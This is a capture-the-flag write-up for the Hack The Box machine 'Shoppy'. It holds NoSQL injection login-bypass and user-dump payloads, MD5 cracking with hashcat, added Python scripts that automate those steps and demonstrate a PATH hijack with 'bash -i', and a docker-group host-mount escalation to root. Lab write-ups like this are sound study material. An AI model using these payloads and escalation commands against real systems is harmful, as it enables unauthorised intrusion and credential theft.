
Shoppy

Initial nmap scans give us a few open ports, including an HTTP server on 80 that is served under the name shoppy.htb, so that name needs an /etc/hosts entry before we can browse to http://shoppy.htb

Running feroxbuster against port 80 we find a /login page.

Check for virtual hosts by fuzzing the Host header; `--hc 301` hides the 301 that every non-matching name gets back, so only vhosts that respond differently show up:

  • wfuzz -c -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u 'http://shoppy.htb' -H "Host: FUZZ.shoppy.htb" --hc 301

This finds mattermost; add mattermost.shoppy.htb to /etc/hosts as well.

The login form is vulnerable to NoSQL injection. Sending the following as both fields bypasses it: the quote breaks out of the username string, `|| 1==1` makes the filter always true, and the %00 null byte truncates whatever the application appends after our input.

  • user=' || 1==1%00&pass=' || 1==1%00

The admin user search is injectable the same way; the following request dumps every user record, password hashes included:

  • http://shoppy.htb/admin/search-users?username=admin'||'1==1
```json
[
  {
    "_id": "62db0e93d6d6a999a66ee67a",
    "username": "admin",
    "password": "23c6877d9e2b564ef8b32c3a23de27b2"
  },
  {
    "_id": "62db0e93d6d6a999a66ee67b",
    "username": "josh",
    "password": "6ebcea65320589ca4f2f1ce039975995"
  }
]
```
The hashes are 32 hex characters with no salt, i.e. plain MD5, so hashcat mode 0 with rockyou cracks josh's:

  • hashcat -m 0 shoppy.htb.hashes.josh /usr/share/wordlists/rockyou.txt

and we get josh's password: 6ebcea65320589ca4f2f1ce039975995:remembermethisway
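The three web steps above (bypass payload, user dump, offline MD5 cracking) scripted end to end. This is an added example, not code from the original writeup. The form field names `user`/`pass`, the host and the `/admin/search-users` path are taken as written above; the idea that the backend builds a MongoDB filter from the raw strings is an inference, not something the page shows; the JSON sample is the exact response shown above, and the wordlist is a constructed stand-in for rockyou.txt.

```python
"""Added example, not part of the original writeup: scripts the login bypass
payload, the /admin/search-users dump and the offline MD5 cracking step.

Assumptions: field names `user`/`pass`, host and endpoint path are taken from
the writeup; the backend building a MongoDB filter from the raw strings is an
inference; SAMPLE_WORDLIST is a constructed stand-in for rockyou.txt."""
import hashlib
import json
import urllib.parse
import urllib.request
from collections import defaultdict

TARGET = "http://shoppy.htb"          # host from the writeup
SEARCH_PATH = "/admin/search-users"   # endpoint from the writeup


def login_bypass_body() -> bytes:
    """Form body for the bypass. The literal NUL becomes %00 when URL-encoded;
    it truncates whatever the server appends after our input, so the injected
    `|| 1==1` is the last thing evaluated."""
    payload = "' || 1==1\x00"
    return urllib.parse.urlencode({"user": payload, "pass": payload}).encode()


def search_users_url(injected: str = "admin'||'1==1") -> str:
    """URL for the user dump: the quote closes the username string and the
    string literal '1==1' that follows is truthy, so every record matches."""
    return TARGET + SEARCH_PATH + "?" + urllib.parse.urlencode({"username": injected})


def fetch_users(session_cookie: str) -> list:
    """Network step (only works against the box): reuse the session cookie the
    bypassed login set and pull the JSON array the page shows."""
    req = urllib.request.Request(search_users_url(), headers={"Cookie": session_cookie})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return json.loads(resp.read().decode())


def extract_hashes(users_json: str) -> dict:
    """username -> MD5 hex digest from the search-users JSON array."""
    return {u["username"]: u["password"].lower() for u in json.loads(users_json)}


def crack_md5(hashes: dict, wordlist) -> dict:
    """Offline equivalent of `hashcat -m 0`: hash each candidate once and look
    it up against every outstanding digest; returns username -> plaintext.
    Users sharing a digest are all resolved by the same candidate."""
    targets = defaultdict(list)
    for user, digest in hashes.items():
        targets[digest].append(user)
    cracked = {}
    for word in wordlist:
        word = word.rstrip("\r\n")
        digest = hashlib.md5(word.encode()).hexdigest()
        for user in targets.pop(digest, []):
            cracked[user] = word
        if not targets:
            break
    return cracked


# Constructed sample input: the exact JSON returned in the writeup, plus a tiny
# wordlist standing in for rockyou.txt.
SAMPLE_DUMP = json.dumps([
    {"_id": "62db0e93d6d6a999a66ee67a", "username": "admin",
     "password": "23c6877d9e2b564ef8b32c3a23de27b2"},
    {"_id": "62db0e93d6d6a999a66ee67b", "username": "josh",
     "password": "6ebcea65320589ca4f2f1ce039975995"},
])
SAMPLE_WORDLIST = ["123456", "password", "letmein", "remembermethisway", "qwerty"]

if __name__ == "__main__":
    print(login_bypass_body())
    print(search_users_url())
    print(crack_md5(extract_hashes(SAMPLE_DUMP), SAMPLE_WORDLIST))
```

Against the box, `fetch_users` needs the session cookie the bypassed login sets; the cracking part runs entirely offline and, with the sample wordlist, recovers josh's password while leaving admin's digest uncracked.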

We can log in to the mattermost subdomain with josh's credentials.

Checking the recent mentions we have a note from jaeger:

```text
For the deploy machine, you can create an account with these creds :
username: jaeger
password: Sh0ppyBest@pp!
And deploy on it.
```

also:

```text
josh
1:25 AM

Oh I forgot to tell you, that we're going to use docker for the deployment, so I will add it to the first deploy
```

We can log in over SSH with jaeger's credentials and grab the user.txt flag.

Checking `sudo -l`, we are allowed to run `sudo -u deploy /home/deploy/password-manager`.

The binary prompts for a master password and, once the right one is entered, runs `cat /home/deploy/creds.txt`. Because `cat` is called without its full path, a PATH hijack looks possible: create a `cat` script in /tmp containing `bash -i`, then put /tmp first with `export PATH=/tmp:$PATH`. One thing to check before relying on that: if the `sudo -l` output lists `secure_path` under Defaults (the stock Debian and Ubuntu sudoers do), sudo replaces the caller's PATH with that value and the planted `cat` is never found. Opening the binary in Ghidra shows the hard-coded master password is `Sample`, and running it with that password prints the deploy credentials:

```text
Welcome to Josh password manager!
Please enter your master password: Sample
Access granted! Here is creds !
Deploy Creds :
username: deploy
password: Deploying@pp!
```
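The PATH-hijack idea from the password-manager step, rebuilt in a throwaway directory so you can see the planted `cat` win under the caller's PATH and lose under a sudo-style `secure_path`. This is an added example, not code from the writeup; it assumes, as the text above says, that the binary runs `cat /home/deploy/creds.txt` through a shell without qualifying `cat`, and uses `sh -c` as a stand-in for that call.

```python
"""Added example, not from the writeup: reproduces the PATH hijack against an
unqualified `cat` in a temp directory, and the same call with PATH forced to a
sudo secure_path value, where the hijack does not fire.

Assumption: the target binary invokes `cat <file>` via a shell without a full
path to cat; `sh -c` below stands in for that invocation."""
import os
import stat
import subprocess
import tempfile

# Stock Debian/Ubuntu sudoers value. When secure_path is set, sudo replaces the
# caller's PATH with this, which is exactly what defeats the hijack.
DEBIAN_SECURE_PATH = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

# Stand-in for the `bash -i` payload above; it just proves which cat ran.
FAKE_CAT = "#!/bin/sh\necho HIJACKED\n"


def run_unqualified_cat(secure_path=None) -> str:
    """Run `cat <creds>` the way the binary does, with a planted `cat` sitting
    in a directory we prepend to PATH (the `export PATH=/tmp:$PATH` step).
    secure_path=None keeps the attacker-controlled PATH; a string forces PATH
    to that value, as sudo does with secure_path set."""
    with tempfile.TemporaryDirectory() as tmp:
        creds = os.path.join(tmp, "creds.txt")
        with open(creds, "w") as f:
            f.write("real creds\n")

        fake = os.path.join(tmp, "cat")
        with open(fake, "w") as f:
            f.write(FAKE_CAT)
        os.chmod(fake, os.stat(fake).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)

        env = dict(os.environ)
        if secure_path is None:
            env["PATH"] = tmp + ":" + env.get("PATH", "/usr/bin:/bin")
        else:
            env["PATH"] = secure_path

        result = subprocess.run(["sh", "-c", "cat " + creds], env=env,
                                capture_output=True, text=True)
        return result.stdout.strip()


if __name__ == "__main__":
    print("caller PATH :", run_unqualified_cat())
    print("secure_path :", run_unqualified_cat(DEBIAN_SECURE_PATH))
```

The first call prints `HIJACKED`, the second prints the real file contents. On the box, the `sudo -l` Defaults line tells you which of the two cases applies; when `secure_path` is set, the hard-coded master password is the route that works, which is the one the output above takes.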

su to deploy with that password.

Checking `id`, deploy is a member of the docker group. Anyone who can talk to the Docker daemon can start a container with the host's filesystem mounted and act as root on it, as described at https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation. First confirm the socket is there, then mount / into an alpine container and chroot into it (if the alpine image is not already present locally, `docker images` shows what is available, otherwise docker will try to pull it):

  • find / -name docker.sock 2>/dev/null
  • docker run -it -v /:/host/ alpine chroot /host/ bash

and we’re root

This post is licensed under CC BY 4.0 by the author.